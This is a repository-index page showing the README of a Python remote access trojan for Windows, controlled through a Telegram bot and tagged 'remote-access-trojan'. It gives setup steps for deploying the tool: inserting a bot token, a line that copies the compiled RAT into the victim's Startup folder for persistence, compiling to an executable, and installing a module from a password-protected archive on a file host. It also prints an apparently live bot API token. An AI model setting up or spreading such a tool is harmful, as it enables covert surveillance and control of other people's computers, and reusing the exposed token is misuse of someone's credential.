https://github.com/the404hacking/windows-python-rat
A New Microsoft Windows Remote Administrator Tool [RAT] with Python by Sir.4m1R.
https://github.com/the404hacking/windows-python-rat
api api-token bot microsoft module py python python-telegram-bot rat remote-access-trojan remote-admin-tool remote-administrator-tool robot setup sir4m1r telegram the404hacking token windows windows-python-rat
Last synced: 9 months ago
JSON representation
A New Microsoft Windows Remote Administrator Tool [RAT] with Python by Sir.4m1R.
- Host: GitHub
- URL: https://github.com/the404hacking/windows-python-rat
- Owner: The404Hacking
- Created: 2018-04-05T10:48:38.000Z (over 7 years ago)
- Default Branch: mater
- Last Pushed: 2020-04-11T06:22:02.000Z (over 5 years ago)
- Last Synced: 2025-03-23T19:51:29.206Z (9 months ago)
- Topics: api, api-token, bot, microsoft, module, py, python, python-telegram-bot, rat, remote-access-trojan, remote-admin-tool, remote-administrator-tool, robot, setup, sir4m1r, telegram, the404hacking, token, windows, windows-python-rat
- Language: Python
- Homepage: https://T.me/The404Hacking
- Size: 769 KB
- Stars: 105
- Watchers: 2
- Forks: 40
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-rat - **29**星
README
# Windows-Python-RAT
## Microsoft Windows Remote Administrator Tool
Language: Python
Coder: Sir.4m1R
Developer: Ahoora Mansouri
------------------------
Powered By The404Hacking
Digital Security ReSearch Group
-------------------------------
# Robot for initial Windows-Python-RAT testing
Bot ID: [@W_P_RAT_Bot](https://t.me/W_P_RAT_Bot)
Token: `586363223:AAHSLdPnAE60avs_T25l_HjzRahtw6PhxDY`
-------------------------------
# Set Bot API-Token
To replace your robot Token in RAT, simply go to Line 35 in the **Windows-Python-RAT.py** file and place your API-TOKEN instead of `TOKEN`.
In Line 35:
```python
#Replace Your Bot API-TOKEN
update = Updater("TOKEN")
```
Example for Replace Token:

-------------------------------
# StartUP Setting
For startup setting, you must first write the name of your bot before compiling it in the **Windows-Python-RAT.py** file. For example, before compiling the RAT file, you need to go to line 281 and name it as an `YOUR-COMPILED-RAT-NAME.exe`.
In Line 281:
```python
os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"')
#replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe'
```
Video Tutorial Setting Up a Startup on a RAT: [Watch](https://www.aparat.com/v/MzAX1)

-------------------------------
# Python
[Windows-Python-RAT](https://github.com/The404Hacking/Windows-Python-RAT/) requires Python version 2.7.x
Download [Python](https://python.org) Version 2.7.13: Click [Here](https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi)
-------------------------------
# Download Python
> [Python 2.7.14 - 2017-09-16](https://www.python.org/downloads/release/python-2714/)
>> Download [for Windows (.msi)](https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi)
-------------------------------
# Install Python
Learning Install Python on Microsoft Windows: Click [Here](https://t.me/The404Hacking/528)
-------------------------------
# Module in Python
To use the **Windows-Python-RAT**, you need to install the following modules in your python.
For automatic installation, you can first open the **Setup.py** (`python Setup.py`) file and select the `[1] Install Module` option.
To install the modules manually, simply enter the commands for installing each module in your `CMD` or `Terminal`.
*Module List:*
* Upgrade pip
> python -m pip install --upgrade pip
* Python Telegram Bot (Telegram API for Python)
> python -m pip install python-telegram-bot
* Pyttsx (for Play Voice)
> python -m pip install pyttsx
* PyInstaller (for Compile py file)
> python -m pip install pyinstaller
* Autopy (for Take Screenshot)
> Download from [Telegram Channel](https://t.me/The404Hacking/3317) or [PicoFile](http://s9.picofile.com/file/8323038234/autopy_The404Hacking_.rar.html) and Click on Autopy.exe for Install.
Password `autopy-[@The404Hacking].rar` File is: **@The404Hacking**
-------------------------------
# AutoPy Module in Python
learning Install AutoPy Module on Python 2: [Watch](https://www.aparat.com/v/ULPHV)
Download from [Telegram Channel](https://t.me/The404Hacking/3317) or [PicoFile](http://s9.picofile.com/file/8323038234/autopy_The404Hacking_.rar.html) and Click on Autopy.exe for Install.
Password `autopy-[@The404Hacking].rar` File is: **@The404Hacking**
-------------------------------
# Clone and Run Setup
+ Linux:
```
git clone https://github.com/The404Hacking/Windows-Python-RAT.git
cd Windows-Python-RAT
python Setup.py
```
+ Windows:
```
Download from https://github.com/The404Hacking/Windows-Python-RAT/archive/master.zip
Windows-Python-RAT-master.zip
Extract files.
cd Windows-Python-RAT
python Setup.py
```
-------------------------------
Logo:

Setup ScreenShot:

RAT Control Panel [@W_P_RAT_Bot](https://T.me/W_P_RAT_Bot):


# Download and Clone
> Download: Click [Here](https://github.com/The404Hacking/Windows-Python-RAT/archive/master.zip)
> Clone: git clone [https://github.com/The404Hacking/Windows-Python-RAT.git](https://github.com/The404Hacking/Windows-Python-RAT.git)
# The404Hacking | Digital UnderGround Team
[The404Hacking](https://T.me/The404Hacking)
# Follow us !
[The404Hacking](https://T.me/The404Hacking) - [The404Cracking](https://T.me/The404Cracking)
[Instagram](https://instagram.com/The404Hacking) - [GitHub](https://github.com/The404Hacking)
[YouTube](http://yon.ir/youtube404) - [Aparat](http://www.aparat.com/The404Hacking)
[Blog](http://the404hacking.blogsky.com) - [Email](mailto:The404Hacking.Team@Gmail.Com)